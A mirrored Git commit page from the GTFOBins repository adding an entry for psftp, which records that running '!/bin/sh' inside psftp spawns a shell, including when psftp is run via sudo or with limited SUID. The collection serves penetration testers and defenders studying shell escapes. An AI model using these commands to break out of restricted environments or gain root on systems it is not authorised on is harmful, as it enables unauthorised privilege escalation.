mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
Add psftp
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
71de637921
commit
c32b82b5e9
15
_gtfobins/psftp.md
Normal file
15
_gtfobins/psftp.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
psftp
|
||||||
|
!/bin/sh
|
||||||
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
sudo psftp
|
||||||
|
!/bin/sh
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo psftp
|
||||||
|
!/bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user